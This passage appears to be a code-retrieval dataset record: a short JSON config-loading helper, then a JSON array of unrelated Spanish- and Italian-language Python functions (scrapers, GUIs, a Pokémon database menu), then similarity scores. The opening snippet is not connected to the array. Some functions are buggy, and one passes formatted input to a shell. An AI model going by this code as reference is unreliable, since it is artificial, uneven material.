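configurar() above opens its JSON settings with a try/except FileNotFoundError fallback that creates the file from defaults on first run. The same load-or-create pattern, extracted as a reusable sketch:

import json

def cargar_config(ruta, valores_por_defecto):
    # Return the stored config, writing the defaults on first run.
    try:
        with open(ruta, encoding="UTF-8") as f:
            return json.load(f)
    except FileNotFoundError:
        with open(ruta, "w", encoding="UTF-8") as f:
            json.dump(valores_por_defecto, f, indent=4)
        return valores_por_defecto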
lambda: asyncio.run(\n register_user(host, port, ent)\n )\n but.pack()\n\n root.mainloop()", "def updatePeliculas():\n\txml_ciudades = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1\"\n\txml_peliculas = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1&ciudad=%s&byciudad=1\" #id_ciudad\n \n\tciudades = parse_ciudades( urlopen(url_movil) ) \n\t\n\t\n\tbase_url_pelicula = \"http://www.cinemex.com/cartelera/pelicula.php?vcode=%s\" #mex_vc\n\tpeliculas = {}\n \n\tpelis_obj = [] #Contiene toda la info de las peliculas, titulo, sinopsis, etc\n \n\t#Crea un diccionario con el vc y el objeto de la pelicula\n\t#De esta forma no hay peliculas repetidas\n\tfor ciudad_id in ciudades:\n\t\txml_url = xml_peliculas % ciudad_id\n\t\ttry:\n\t\t\txml = urlopen(xml_url)\n\t\texcept:\n\t\t\tlogger.debug( 'error cargando pagina %s' % xml_url)\n\t\t\tcontinue\n\t\tpelis_actual = parse_peliculas(xml)\n\t\t#Agregar las peliculas q no estan todavia\n\t\tfor peli in pelis_actual:\n\t\t\tkey = peli.get('mex_vc', '')\n\t\t\tif key not in peliculas: peliculas[key] = peli\n \n\tfor k, v in peliculas.items():\n\t\turl = base_url_pelicula % k\n\t\thtml = urlopen(url)\n\t\tpelis_obj.append(scrape_pelicula(html, v))\n \n\tfor peli in pelis_obj:\n\t\tcreatePelicula(peli)", "def acquisizioneParametri(self):\n\n messaggio =''\n\n try: \n self.__rete = slugify(self.ui.nomeRete.text())\n # controllo se la lunghezza del nome inserito sia > di 5 caratteri\n if(len(self.__rete) < 5 or len(self.__rete) > 30):\n\n messaggio = 'err: inserimento Nome'\n raise NameError\n \n # controllo che il nome scelto sia univoco\n isPresent = self.__NNNameCheck()\n if(isPresent):\n messaggio = 'err: nome già utilizzato'\n raise NameError\n\n # controlli su numero layer e numero nodi che siano >= 1\n # e che siano rispettivamente <= 20 e <= 50\n self.__layer = int(self.ui.nLayer.text())\n if(self.__layer < 1):\n messaggio = 'err: numero layer < 1'\n raise ValueError\n elif(self.__layer >= 20):\n messaggio = 'err: numero layer > 20'\n raise ValueError\n\n self.__nodi = int(self.ui.nNodi.text())\n if(self.__nodi < 1):\n messaggio = 'err: numero nodi < 1'\n raise ValueError\n if(self.__nodi >= 50):\n messaggio = 'err: numero nodi > 50'\n raise ValueError\n\n # salvataggio della funzione scelta\n self.__funzione = self.ui.funzione.currentText()\n \n # controllo che la percentuale di Vs sia < 25%\n # e che la percentuale di Ts sia > 75%\n if(self.__percentuale < 25):\n messaggio = 'err: suddivisione'\n raise ValueError\n if (self.__percentuale > 75):\n messaggio = 'err: suddivisione'\n raise ValueError\n\n # controllo che sia stato scelto effettivamente un dataset\n if(len(self.__dataSet) == 0):\n messaggio = 'err: dataSet errato'\n raise NameError\n\n # setto il tasto caricamento di una rete non cliccabile\n self.ui.but_caricaRete.setEnabled(False)\n\n # cambio nome del tasto convalida\n self.ui.but_convalida.setText('confermato')\n self.ui.comunicazione.setText('')\n #abilito salvataggio\n self.ui.but_salva.setEnabled(True)\n\n # settandola a True permetto che il training venga effettuato\n # dato che i dati inseriti sono validi\n self.__convalida = True\n return True\n except:\n # in caso di eccezzioni faccio comparire il messaggio\n self.ui.comunicazione.setText(messaggio)\n return False", "def tirar_foto(frame, dimensoes, file_name, vaga, entrada_saida=\"E\"):\n (x, y, w, h) = dimensoes[0], dimensoes[1], dimensoes[2], dimensoes[3]\n file = f\"imagens/{file_name}.png\"\n imagem = frame[y:y + h, x:x + w]\n 
cv2.imwrite(file, imagem)\n print(f'foto salva -> {file_name}')\n\n print(\"detectando placa....\")\n recognize_license_plate(file, vaga, entrada_saida)\n print(\"fim detecção placa\")", "def entero(self):\n return int(\"\".join(self.binario), 2)", "def velocidade_porta(self): # Testar este metodo.\r\n porta, velocidade = args\r\n if \"usb\" in porta:\r\n if velocidade:\r\n ## Retorna \"0\" se executado com sucesso\r\n status = subprocess.call(\r\n \"stty -F /dev/ttyUSB0 speed {0}\".format(velocidade),shell=True)\r\n else:\r\n status = subprocess.call(\r\n \"stty -a < /dev/ttyUSB0\",shell=True)\r\n else:\r\n pass\r\n\r\n if status == 0:\r\n # comando executado com sucesso\r\n return {\"status\": 1}\r\n else:\r\n return {\"status\": 0}", "def iniciarEtiquetas(self):\n self.ingrese = Label(self.master, text=\"Ingrese sus datos\", font=\"Arial 12\", width=45)\n self.ingrese.grid(row=0, column=0, sticky=N, columnspan=5, pady=10)\n self.ingrese.configure(bg=\"#9a32cd\")\n self.tituloLabel = self.crearEtiqueta(\"Título\", \"Arial 12\", 1, 0, \"#f2f2f2\")\n self.descripcionLabel = self.crearEtiqueta(\"Descripción\", \"Arial 12\", 2, 0, \"#f2f2f2\")\n self.mostrarString.set('Mostrando Registros Existentes en ' + str(self.base.getDbName()))\n self.tituloTree = Label(text=self.mostrarString.get(), font=\"Arial 10\", bg=\"#d9d9d9\")\n self.tituloTree.grid(row=3, column=0, sticky=N, columnspan=4,pady=10)", "def reemplaza_tildes(palabra):", "def saluda1(sujeto):\n print 'Hola '+sujeto+' !!'", "def run_ejercicio_3():\n\n # Parametros para el ejercicio\n lower = 0\n upper = 4 * np.pi\n number_of_points = 100\n\n print(f\"Separando el intervalo [{lower}, {upper}] en {number_of_points} puntos equidistantes\")\n values = np.linspace(lower, upper, number_of_points)\n print(\"\")\n\n print(f\"Mapeando los valores a las tres funciones dadas\")\n sin_values, cos_values, complex_function_values = map_values_to_functions(values)\n print(\"\")\n\n print(f\"Los valores son: {values}\\n\")\n print(f\"Valores en el seno: {sin_values}\\n\")\n print(f\"Valores en el coseno: {cos_values}\\n\")\n print(f\"Valores en tanh(sin + cos): {complex_function_values}\\n\")\n print(\"\")\n wait_for_user_input()\n\n print(\"Mostrando la grafica de los valores\")\n plot_three_functions(values, sin_values, cos_values, complex_function_values)", "def update():\n\tid_update = int(input(\"Ingrese ID de pokemon: \"))\n\texistencia = \"\"\"\n\t\t\t\tSELECT * FROM sansanito\n\t\t\t\tWHERE id = :1\"\"\"\n\tcur.execute(existencia, [id_update])\n\tres = cur.fetchall()\n\t# Si res es vacio, no existe ningun registro con ID ingresado\n\tif res == []:\n\t\tprint(\"ID no encontrado en la tabla!\")\n\t\tprint(\"Devolviendo al menu principal...\")\n\t\ttime.sleep(1)\n\t\treturn\n\telse:\n\t\t# Submenu de la opcion\n\t\tupdate_menu_title = \"QUE CAMPO DE REGISTRO CON ID \" + str(id_update) + \" DESEA CAMBIAR?\\n\"\n\t\tupdate_menu_items = [\"HP Actual\", \"Estado\", \"Fecha y hora de ingreso\", \"Salir\"]\n\t\tupdate_menu_cursor = \"> \"\n\t\tupdate_menu_cursor_style = (\"fg_red\", \"bold\")\n\t\tupdate_menu_style = (\"bg_purple\", \"fg_yellow\")\n\t\tupdate_menu_exit = False\n\n\t\tupdate_menu = TerminalMenu(menu_entries=update_menu_items,\n\t\t\t\t\t\t\t title=update_menu_title,\n\t\t\t\t\t\t\t menu_cursor=update_menu_cursor,\n\t\t\t\t\t\t\t menu_cursor_style=update_menu_cursor_style,\n\t\t\t\t\t\t\t menu_highlight_style=update_menu_style,\n\t\t\t\t\t\t\t cycle_cursor=True,\n\t\t\t\t\t\t\t clear_screen=True)\n\n\twhile not 
update_menu_exit:\n\t\tupdate_sel = update_menu.show()\n\t\tprint(\"REGISTRO ESCOGIDO:\")\n\t\tprint_table(hdrs_sansanito, True, res)\n\t\t# Cambiar HP Actual\n\t\tif update_sel == 0:\n\t\t\thp_actual = int(input(\"Ingrese HP actual de pokemon: \"))\n\t\t\tquery_estnom = \"\"\"\n\t\t\t\t\t\t\tSELECT nombre, estado\n\t\t\t\t\t\t\tFROM sansanito\n\t\t\t\t\t\t\tWHERE id = :1\"\"\"\n\t\t\tcur.execute(query_estnom, [id_update])\n\t\t\testnom = cur.fetchall()\n\t\t\tprioridad = calculate_priority(estnom[0][0], hp_actual, estnom[0][1])\n\t\t\tif prioridad != -1:\n\t\t\t\tquery_update = \"\"\"\n\t\t\t\t\t\t\t\tUPDATE sansanito\n\t\t\t\t\t\t\t\tSET hpactual = :1, prioridad = :2\n\t\t\t\t\t\t\t\tWHERE id = :3\"\"\"\n\t\t\t\tcur.execute(query_update, [hp_actual, prioridad, id_update])\n\t\t# Cambiar estado\n\t\telif update_sel == 1:\n\t\t\testado = input(\"Ingrese el estado. Si el pokemon no tiene estado, ingrese X: \")\n\n\t\t\tif estado.upper() == \"X\":\n\t\t\t\testado = None\n\n\t\t\tif estado not in estados_permitidos:\n\t\t\t\tprint(\"Estado de pokemon no permitido. Registro no fue insertado.\")\n\t\t\t\tprint(\"Devolviendo al menu de update...\")\n\t\t\t\ttime.sleep(1)\n\t\t\telse:\n\t\t\t\tquery_nomhp = \"\"\"\n\t\t\t\t\t\t\t\tSELECT nombre, hpactual\n\t\t\t\t\t\t\t\tFROM sansanito\n\t\t\t\t\t\t\t\tWHERE id = :1\"\"\"\n\t\t\t\tcur.execute(query_nomhp, [id_update])\n\t\t\t\tnomhp = cur.fetchall()\n\t\t\t\tprioridad = calculate_priority(nomhp[0][0], nomhp[0][1], estado)\n\t\t\t\tif prioridad != -1:\n\t\t\t\t\tquery_update = \"\"\"\n\t\t\t\t\t\t\t\tUPDATE sansanito\n\t\t\t\t\t\t\t\tSET estado = :1, prioridad = :2\n\t\t\t\t\t\t\t\tWHERE id = :3\"\"\"\n\t\t\t\t\tcur.execute(query_update, [estado, prioridad, id_update])\n\t\t# Cambio de fecha de ingreso\n\t\telif update_sel == 2:\n\t\t\tfecha = input(\"Ingrese la fecha en formato DD/MM/YY HH:MM (ej 06/09/20 14:20): \")\n\t\t\tprint(\"Nueva fecha\", fecha)\n\t\t\tquery_fecha = \"\"\"\n\t\t\t\t\t\tUPDATE sansanito\n\t\t\t\t\t\tSET ingreso = to_date(:1, 'DD/MM/YY HH24:MI')\n\t\t\t\t\t\tWHERE id = :2\n\t\t\t\t\t\t\"\"\"\n\t\t\tcur.execute(query_fecha, [fecha, id_update])\n\t\t# Salir\n\t\telif update_sel == 3:\n\t\t\tupdate_menu_exit = True\n\n\t\tcur.execute(existencia, [id_update])\n\t\tres = cur.fetchall()", "def OnButton(self, event):\n chicloVrach = random.randint(123, 130)\n\n print('chislo',chicloVrach )\n self.Glavnaja()", "def esperarUnRato(self):\n if self.stepByStep:\n sleep(0.7)\n self.telaMAPA.update()\n self.pantalla.update()", "def abrirDialogoDeConfiguracion(self):\n ventanaEmergente = Toplevel()\n ventanaEmergente.geometry(\"200x320\")\n # Se crea un canvas\n tela = Canvas(ventanaEmergente, height=320, width=200, bg=\"snow\")\n tela.place(x=0, y=0)\n btnColorEspacioDisponible = Button(tela, text=\"Espacio Disponible\", command = lambda :self.cambiarColor(0))\n btnColorEspacioDisponible.place(x=50, y=20)\n btnColorPared = Button(tela, text=\"Paredes\", command = lambda :self.cambiarColor(2))\n btnColorPared.place(x=66, y=50)\n btnColorNodo = Button(tela, text=\"Nodo\", command = lambda :self.cambiarColor(3))\n btnColorNodo.place(x=70, y=80)", "def actualizar_puntaje(self):\r\n pass", "def atencion_ingreso(self, camion):\r\n\r\n operaciones = self.operaciones[\"Operaciones complementarias\"]\r\n\r\n if camion.tipo == \"Descarga\":\r\n yield self.process(operaciones[\"Atencion recepcion 1\"]\r\n .ejecutar(self, camion))\r\n else:\r\n yield self.process(operaciones[\"Atencion despacho 1\"]\r\n .ejecutar(self, camion))\r\n\r\n if 
camion.carga not in [\"Contenedor 20\", \"Contenedor 40\"] and \\\r\n not (camion.tipo == \"Carga\" and camion.carga == \"Harina de Soya - Hi Pro/Pellet de Soya\"):\r\n yield self.process(operaciones[\"Primer pesaje\"]\r\n .ejecutar(self, camion))\r\n self.exit(camion.nombre)", "def cobroEfectivo(self):\n if self.total_a_pagar == 0:\n QtGui.QMessageBox.information(self,\"Aviso\",\"El saldo restante a pagar es cero\")\n else:\n self.rbtnEfectivo.setChecked(True)\n monto_a_pagar, ok = QtGui.QInputDialog.getDouble(self,\"Cobro Efectivo\",\"Ingrese monto a pagar\",0,0,2000,2)\n\n if ok:\n if monto_a_pagar >= self.total_a_pagar:\n QtGui.QMessageBox.information(self,\"Cobro Efectivo\",\"Su vuelto es:%.2f\" % (monto_a_pagar - self.total_a_pagar))\n temp = [\"Efectivo\",monto_a_pagar]\n self.detalles_cobro[self.tablePagos.rowCount()] = temp\n self.total_a_pagar = 0\n elif monto_a_pagar == 0:\n QtGui.QMessageBox.information(self,\"Aviso\",\"El monto ingresado no puede ser cero\")\n else:\n temp = [\"Efectivo\",monto_a_pagar]\n self.detalles_cobro[self.tablePagos.rowCount()] = temp\n self.total_a_pagar -= monto_a_pagar\n\n self.actualizar_total()\n self.actualizar_tabla()", "def imprimir_menu():\n print(\"Que desea realizar en la matriz\")\n print(\"1. Presentar el nro Central \")\n print(\"2. Presentar los nros en forma espiral desde el centro \")\n print(\"3. Multiplos del nro central\")", "def crear_arbol():\n print (\"En este programa te brindamos 2 opciones para crear arboles, elige la que mas se adapte a tu objetivo\")\n \n try:\n crear=int(input(\"1. Crear un arbol de manera aleatoria\\n2. Introducir los datos en forma de arreglo\\n\"))\n except:\n print(\"Valor Invalido\")\n \n if crear==1:\n print(\"\\nExcelente! Tu arbol sera generado de forma aleatoria. Solo necesitamos aclarar que tipo de arbol quieres\")\n while True:\n try:\n altura=int(input(\"\\nAñade la altura de tu arbol: \"))\n except:\n print(\"El valor introducido no es valido!\")\n else:\n break\n \n perfecto=input(\"\\n¿Deseas crear un arbol perfecto? (si/no): \")\n if perfecto.lower()!=\"no\":\n perfecto=True\n else:\n perfecto=False\n \n arbol=tree(height=altura, is_perfect=perfecto)\n return arbol\n \n elif crear==2:\n print(\"\\nExcelente! Tu arbol sera generado en base a un arreglo. Solo necesitamos recibir los valores\")\n valores=[]\n counter=0\n print(\"\\nIntroduce los valores en orden. El valor inicial sera considerado la raiz. Los valores se ordenaran de izquiera a derecha.\" +\n \"Deja el valor en blanco para saltar ese espacio. Escribe -1 para dejar de añadir valores\")\n valor=\" \"\n while valor!=\"-1\":\n valor=input(f\"Introduzca el valor {counter}: \")\n if valor==\"\":\n valor=None\n valores.append(valor)\n counter+=1\n else:\n valores.append(int(valor))\n counter+=1\n valores.pop()\n root=build(valores)\n return root", "def cambiar_puntaje(self):\r\n self.puntaje_maximo = self.puntos_maximos.value()\r\n sleep(0.1)\r\n puntaje = {\"status\": \"cambio_puntaje\",\r\n \"data\": self.puntaje_maximo}\r\n self.server_signal_2.emit(puntaje)", "def main():\n\tFORCE_CONSOLE = False\n\n\tif FORCE_CONSOLE:\n\t\tdeboggue(\"Le jeu est en mode console\")\n\t\tchoisir_programme()\n\telse:\n\t\tdeboggue(\"Le jeu est en mode graphique\")\n\t\tfenetre = creer_fenetre()\n\t\timages = charge_images()\n\t\tchoisir_programme_gui(fenetre, images)\n\n\tdeboggue(\"Arrêt normal\")", "def instructions():\n print(\n \"\"\"\n TURNING ON TELEVISION\n\n Use your keypad to interact with the television:\n 1. 
Enter a number to change change\n 2. Enter \"up\" or \"down\" to adjust volume\n 3. Enter \"off\" to turn on television\n\n \"\"\")" ]
[ "0.6960144", "0.62438864", "0.5807747", "0.5806468", "0.5786809", "0.5756569", "0.5700163", "0.5687251", "0.55761003", "0.5567695", "0.5562708", "0.55521", "0.5552041", "0.5549286", "0.5544261", "0.5521034", "0.5520254", "0.54952437", "0.54869676", "0.5480632", "0.54718786", "0.546732", "0.54637545", "0.5458825", "0.54503566", "0.5448864", "0.5444995", "0.54365414", "0.54284465", "0.540552", "0.54053223", "0.5397443", "0.53966594", "0.53886485", "0.53865594", "0.5351897", "0.53487986", "0.5342529", "0.53425276", "0.53406924", "0.53235245", "0.5322911", "0.53216803", "0.5309036", "0.52929175", "0.52879536", "0.5287535", "0.5268164", "0.5263588", "0.52507865", "0.5243421", "0.5237766", "0.5233427", "0.5226427", "0.5215421", "0.5210035", "0.5208519", "0.5194367", "0.5187817", "0.5187339", "0.5185231", "0.5179766", "0.51778847", "0.51714903", "0.51533026", "0.5150834", "0.51490664", "0.5147175", "0.5143922", "0.51364636", "0.5120341", "0.5119915", "0.511856", "0.5112188", "0.5112188", "0.5112188", "0.5112188", "0.5112188", "0.51115227", "0.5109452", "0.5101306", "0.5092109", "0.5079562", "0.5078489", "0.5074811", "0.5071806", "0.5059349", "0.50593126", "0.50572777", "0.5051779", "0.5051364", "0.50484395", "0.50459", "0.503871", "0.5030184", "0.50262725", "0.50222534", "0.50218254", "0.50165683", "0.5014186" ]
0.53275734
40
Carga toda la pila con strings
def cargaAutoStr(pila):
    while not pila_llena(pila):
        largo = random.randint(1, 15)
        apilar(pila, randString(largo))
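A quick aside on the record above: the document snippet calls three helpers (pila_llena, apilar, randString) and uses the random module, none of which are defined in the record itself. The following is a minimal self-contained sketch, not part of the dataset; it assumes a list-backed stack with a hypothetical fixed capacity and a hypothetical randString helper built on random.choices.

import random
import string

CAPACIDAD = 10  # assumed capacity; the record does not specify one

def pila_llena(pila):
    # "pila llena" = stack is full: true once the assumed capacity is reached
    return len(pila) >= CAPACIDAD

def apilar(pila, elemento):
    # "apilar" = push onto the list-backed stack
    pila.append(elemento)

def randString(largo):
    # hypothetical helper: random lowercase string of the requested length
    return ''.join(random.choices(string.ascii_lowercase, k=largo))

def cargaAutoStr(pila):
    # fills the stack with random strings of length 1..15 until it is full
    while not pila_llena(pila):
        largo = random.randint(1, 15)
        apilar(pila, randString(largo))

# usage: start from an empty stack and fill it
pila = []
cargaAutoStr(pila)
print(pila)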
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def comenzar_nuevo_juego():\n escena_uno.cargarEscena1(screen, display_width, display_height)#Se pone a correr la escena\n #escena_uno.cargarEscena2(screen, display_width, display_height)", "def stringToPila(palabra):\n pila = Pila()\n for elemento in palabra:\n apilar(pila, elemento)\n return pila", "def saluda2(sujeto):\n print 'Hola %s !!' % sujeto", "def concatenare_str(obiect, string):\n\tobiect[\"descriere\"] = get_descriere(obiect) + string\n\treturn obiect", "def arroba_letras(cadena, long_palabra, costo_palabra_corta, costo_palabra_larga):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n costo_total = 0\n for i in range(len(palabras)):\n if len(palabras[i]) > long_palabra:#verificio si la longitud de esa palabra cortada es menor a lo previamente establecido\n frase_final += palabras[i][0:long_palabra] + \"@ \" # corto la palabra en la posicion max y agrego un @\n costo_total += costo_palabra_corta\n if palabras[i][-1] == \".\": # veo si en la palabra corta cortada hay un punto y si lo lo borro y reemplazo por un STOP\n frase_final = frase_final.strip() + palabras[i].replace(palabras[i], \" STOP \")\n elif palabras[i][-1] == \".\": # veo si en la palabra larga cortada hay un punto y si lo hay lo borro y lo reemplazo por un STOP\n frase_final = frase_final.strip(\".\") + palabras[i].replace(palabras[i][-1], \" STOP \") \n else:\n frase_final += palabras[i] + \" \"\n costo_total += costo_palabra_larga\n frase_final += \"STOPSTOP\" \n \n return f\"\"\"El telegrama final es: \n{frase_final} \nutilizando {long_palabra} letras maximas por palabra a un costo de ${costo_total} \"\"\"", "def priprema_za_extrakciju_stringova_po_prethodno_generiranoj_naredbi(loka, nare):\r\n lscrypt=loka+'\\\\scrypt.ps1'\r\n narediti=nare\r\n file=open(lscrypt, \"w\")\r\n file.write(narediti)\r\n file.close()", "def archivos_de_texto():\n palabra = \"\" \n palabras_candidatas = [] #lista donde se guardara las palabras candidatas de cada linea\n palabra_cantidad = {} #diccionario con la palabra candidata de clave y las veces que esta repetida en cada texto de valor\n with open(\"Cuentos.txt\",\"r\") as Cuentos: \n for linea_Cuentos in Cuentos: #cada ciclo del for es una linea del texto\n for caracter in linea_Cuentos: #cada ciclo del for es una caracter de la linea \n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter) #se transformas caracteres mayusculas y tildes\n palabra += caracter #cada caracter ira formando la palabra\n if not caracter.isalpha():\n if len(palabra) >= 5: #se analiza que la palabra tenga 5 o mas caracteres\n palabras_candidatas.append(palabra) \n palabra = \"\" #se vacia la palabra ya analizada\n for palabra_en_lista in palabras_candidatas: #se introduce las palabras candidatas a un diccionario\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [1,0,0]\n else:\n palabra_cantidad[palabra_en_lista] = [int(palabra_cantidad[palabra_en_lista][0]) + 1 , 0, 0]\n palabras_candidatas = []\n with open(\"La araña negra - tomo 1.txt\",\"r\") as La_arana_negra:#se repite el mismo proceso con los otros dos textos\n for linea_Cuentos in La_arana_negra:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,1,0]\n else:\n 
palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] , int(palabra_cantidad[palabra_en_lista][1]) + 1, 0]\n palabras_candidatas = [] \n with open(\"Las 1000 Noches y 1 Noche.txt\",\"r\") as muchas_noches: \n for linea_Cuentos in muchas_noches:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,0,1]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] ,palabra_cantidad[palabra_en_lista][1], int(palabra_cantidad[palabra_en_lista][2]) + 1]\n palabras_candidatas = [] \n palabra_cantidad = dict(sorted(palabra_cantidad.items())) #se ordena el diccionario alfabeticamente\n with open(\"palabras.csv\",\"w\") as palabras_csv: # se agrga el diccionario a un arcivo .csv\n for palabra in palabra_cantidad:\n palabras_csv.write(palabra)\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][0]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][1]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][2]))\n palabras_csv.write(\"\\n\")\n return palabra_cantidad", "def creaLE(venta): #Esta sección fue hecha por Ángel\n listaPGA = [] # Esto genera la lista necesaria para pasarlo al archivo\n for elemento in venta:\n listaN = elemento[0] + \",\"\n listaN += str(elemento[1]) + \"\\n\"\n listaPGA.append(listaN)\n return listaPGA", "def empezando_la_partida():\n #estas 2 funciones las importo al menu y al juego\n texto = ' Una vez empezada la partida se encuentran a disposición del jugador el tablero \\n'+\\\n 'y el atril con las fichas para poder jugar, simplemente dando click en la ficha\\n'+\\\n 'deseada y el casillero del tablero deseado podemos ir armando letra a letra la \\n'+\\\n 'palabra de nuestro turno, de esta forma, formando palabras válidas, aprovechando\\n'+\\\n 'los casilleros de bonus y evitando los casilleros de penalización, el jugador va\\n'+\\\n 'sumando puntos.\\n'+\\\n ' El objetivo del juego es obtener más puntos que la maquina antes de que se acabe\\n'+\\\n 'el tiempo, se acaben las fichas del juego o que ya no se puedan formar palabras.'\n return texto", "def saluda1(sujeto):\n print 'Hola '+sujeto+' !!'", "def acquisizioneParametri(self):\n\n messaggio =''\n\n try: \n self.__rete = slugify(self.ui.nomeRete.text())\n # controllo se la lunghezza del nome inserito sia > di 5 caratteri\n if(len(self.__rete) < 5 or len(self.__rete) > 30):\n\n messaggio = 'err: inserimento Nome'\n raise NameError\n \n # controllo che il nome scelto sia univoco\n isPresent = self.__NNNameCheck()\n if(isPresent):\n messaggio = 'err: nome già utilizzato'\n raise NameError\n\n # controlli su numero layer e numero nodi che siano >= 1\n # e che siano rispettivamente <= 20 e <= 50\n self.__layer = int(self.ui.nLayer.text())\n if(self.__layer < 1):\n messaggio = 'err: numero layer < 1'\n raise ValueError\n elif(self.__layer >= 20):\n messaggio = 'err: numero layer > 20'\n raise ValueError\n\n self.__nodi = int(self.ui.nNodi.text())\n if(self.__nodi < 1):\n messaggio = 'err: numero nodi < 1'\n raise ValueError\n if(self.__nodi >= 50):\n messaggio = 'err: numero nodi > 50'\n raise ValueError\n\n # salvataggio della funzione scelta\n self.__funzione = 
self.ui.funzione.currentText()\n \n # controllo che la percentuale di Vs sia < 25%\n # e che la percentuale di Ts sia > 75%\n if(self.__percentuale < 25):\n messaggio = 'err: suddivisione'\n raise ValueError\n if (self.__percentuale > 75):\n messaggio = 'err: suddivisione'\n raise ValueError\n\n # controllo che sia stato scelto effettivamente un dataset\n if(len(self.__dataSet) == 0):\n messaggio = 'err: dataSet errato'\n raise NameError\n\n # setto il tasto caricamento di una rete non cliccabile\n self.ui.but_caricaRete.setEnabled(False)\n\n # cambio nome del tasto convalida\n self.ui.but_convalida.setText('confermato')\n self.ui.comunicazione.setText('')\n #abilito salvataggio\n self.ui.but_salva.setEnabled(True)\n\n # settandola a True permetto che il training venga effettuato\n # dato che i dati inseriti sono validi\n self.__convalida = True\n return True\n except:\n # in caso di eccezzioni faccio comparire il messaggio\n self.ui.comunicazione.setText(messaggio)\n return False", "def __get_data(self):\n ips = self.server.JUGADORES.keys()\n convida = list(ips)\n retorno = \"\"\n for ip in ips:\n nick = self.server.JUGADORES[ip]['nick']\n tanque = self.server.JUGADORES[ip]['path']\n energia = self.server.JUGADORES[ip]['energia']\n vidas = self.server.JUGADORES[ip]['vidas']\n puntos = self.server.JUGADORES[ip]['puntos']\n posicion = self.server.JUGADORES[ip]['pos']\n bala = self.server.JUGADORES[ip]['bala']\n\n datos = \"%s,%s,%s,%s,%s,%s,%s,%s\" % (ip, nick, tanque,\n posicion, vidas, energia, puntos, bala)\n\n explosion = self.server.JUGADORES[ip]['explosiones'].get(\n self.client_address[0], False)\n if explosion:\n datos = \"%s,%s\" % (datos, explosion)\n del(self.server.JUGADORES[ip][\n 'explosiones'][self.client_address[0]])\n\n retorno = \"%s%s||\" % (retorno, datos)\n if vidas == 0:\n convida.remove(ip)\n\n if len(ips) > 1 and len(convida) == 1:\n return \"END\"\n else:\n return retorno.strip()", "def llegir_placa(p):\n\t# Obrim el fitxer\n\ts = \"\"\n\tf=open('places.dat','r+')\n\t# Calculem la posicio que volem mirar\n\tposicio = p*7\n\tf.seek(posicio)\n\ts+=f.read(7)\n\tf.close()\n\treturn s", "def agregar_bolsa(self, letra, cantidad):", "def encode_strings(self):\n self.version = u2b_if_py2(self.version)\n self.short = u2b_if_py2(self.short)\n self.description = u2b_if_py2(self.description)\n self.destination = [u2b_if_py2(m) for m in self.destination]", "def get_cmd_string(res, DVDFab_path, src_iso_path, client_dest_path): \n dest_path = change_fuhao(res[6])\n Dest = get_value(res[6], \"/DEST\")\n Mode = get_value(res[4], \"/MODE\")\n Src = get_value(src_iso_path, \"/SRC\")\n Audio = get_value(res[9], \"/AUDIO\")\n Audio_type = get_value(res[10], \"/AUDIOTYPE\")\n Change_play_order = get_value(res[11], \"/CHANGEPLAYORDER\")\n Copy_IFO = get_value(res[12], \"/COPYIFO\")\n Display_forced_sub = get_value(res[13], \"/DISPLAYFORCEDSUB\")\n Jump_menu = get_value(res[14], \"/JUMPMENU\")\n Jump_main = get_value(res[15], \"/JUMPMAIN\")\n Out_disc = get_value(res[16], \"/OUTDISC\")\n Path_player = get_value(res[17], \"/PATHPLAYER\")\n Preserve_menu_disc2 = get_value(res[18], \"/PRESERVEMENUDISC2\")\n Profile = get_value(res[19], \"/PROFILE\")\n Remove_DTS = get_value(res[20], \"/REMOVEDTS\")\n Remove_HD_audio = get_value(res[21], \"/REMOVEHDAUDIO\")\n Remove_menu = get_value(res[22], \"/REMOVEMENU\")\n Remove_PGC = get_value(res[23], \"/REMOVEPGC\")\n Rewind = get_value(res[24], \"/REWIND\")\n Subtitle = get_value(res[25], \"/SUBTITLE\")\n Title = get_value(res[26], \"/TITLE\")\n 
Volume = get_value(res[27], \"/VOLUME\")\n BD3DT = get_value(res[44], \"/BD3DCONVERTTYPE\")\n COMPRESSTOAC3 = get_value(res[45], \"/COMPRESSTOAC3\")\n Close = ' /CLOSE' \n Createminiso = ' /CREATEMINISO' if os.name == 'nt' else ''\n cmd_string = Mode + Src + Dest + Audio + Audio_type + Change_play_order + Copy_IFO + Display_forced_sub + Jump_menu + Jump_main\\\n + Out_disc + Path_player + Preserve_menu_disc2 + Profile + Remove_DTS + Remove_HD_audio + Remove_menu + Remove_PGC\\\n + Rewind + Subtitle + Title + Volume + BD3DT + COMPRESSTOAC3 + Close + Createminiso\n DVDFab_path_cmd_string = '\"' + DVDFab_path + '\"' + cmd_string \n initlog('the cmd_string: %s' % DVDFab_path_cmd_string)\n return DVDFab_path_cmd_string, dest_path", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def get_data(archivo):\n\n datos = commands.getoutput(\n 'file -ik %s%s%s' % (\"\\\"\", archivo, \"\\\"\"))\n\n retorno = \"\"\n\n for dat in datos.split(\":\")[1:]:\n retorno += \" %s\" % (dat)\n\n return retorno", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def 